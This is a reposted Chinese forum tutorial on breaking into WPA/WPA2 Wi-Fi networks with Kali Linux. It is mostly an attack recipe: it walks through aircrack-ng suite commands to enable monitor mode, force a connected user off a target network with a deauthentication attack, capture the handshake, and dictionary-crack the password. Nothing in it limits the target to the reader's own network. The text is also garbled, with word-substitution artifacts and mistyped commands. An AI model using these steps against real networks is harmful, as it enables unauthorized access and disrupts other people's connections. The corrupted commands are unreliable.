目录本日教各人怎样用kali破解WPA/WPA2加密方式的暗码 前期准备
kali官网kali是什么? 就是一个专门用于渗出行业的Linux发行版本,内里的工具非常丰富,本文就是建立在kali系统的支持之上的 https://www.kali.org/get-kali/#kali-virtual-machines 下载位置下载了vm文件后可以直接用VMware打开,开机后 正式开始检察已安装网卡 以下的操作都需要提升权限,默认的root暗码都是kali [code] #提升权限 sudo su [/code] [code] #检察网卡 airmon-ng[/code]如果没有,请注意是否开启了网卡在虚拟机的毗连,如下图 打开一个终端窗口 开启网卡监控[code] #开启网卡监控 airmon-ng start wlan0[/code]
可以使用下令看看网卡的名字是否改变 [code] ifconfig[/code]可以看到末了的谁人名字已经改变 扫描wifi[code] airodump-ng wlan0mon[/code]我们选择这个名叫adcd的wifi进行破解 等待抓取握手包上述方法后,按ctrl+c,退出扫描 输入下令 [code] airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa[/code]-c:指定信道 需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数 回车后,如下界面 从这个界面可以看出,选定的wifi一共有一个人毗连,没有人毗连的wifi是无法破解的 爆破 抓取握手包这个步调,说白了,就是将一个用户踢下线,让他重新毗连WIFI,这样我们就能监听而且截取到握手包 重启一个终端窗口,一样的,申请管理员权限,暗码默认:kali [code] sudo su[/code]实验如下下令,同样的,需要输入上一步的两个参数,一个客户机的MAC,和路由器的MAC [code] aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon[/code]-a:指定路由器的MAC 实验乐成后如上图,表明该客户机以及被乐成的踢下线,我们要做的就是等待客户机重新毗连,他只要重新毗连了,我们就能抓到握手包,进行跑字典破解 抓取乐成当第四步的终端窗口出现如下 表明乐成抓取到握手包,进行下一个步调 开始破解包在**/home/kali/**文件夹下,找到名叫freedom-01.ivs文件,这个就是抓到的包 然后就是字典,我个人建议将字典一同放在该目录下 然后再次重起一个终端窗口,输入如下下令 [code] ircrack-ng -w pass.txt freedom-*.ivs [/code]回车开始解密 能否乐成看字典的是否强大,也看脸 乐成界面 失败界面 温馨提示kali学的好,牢饭少不了 需要字典的小伙伴可以不要私聊我啦,真的回复不过来了 到此这篇关于使用kali破解wifi暗码的文章就先容到这了,更多相关kali破解暗码内容请搜索脚本之家从前的文章或继承浏览下面的相关文章,希望各人以后多多支持脚本之家! 来源:https://www.jb51.net/LINUXjishu/826395.html 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
|手机版|小黑屋|梦想之都-俊月星空
( 粤ICP备18056059号 )|网站地图
GMT+8, 2025-7-1 18:11 , Processed in 0.036456 second(s), 19 queries .
Powered by Mxzdjyxk! X3.5
© 2001-2025 Discuz! Team.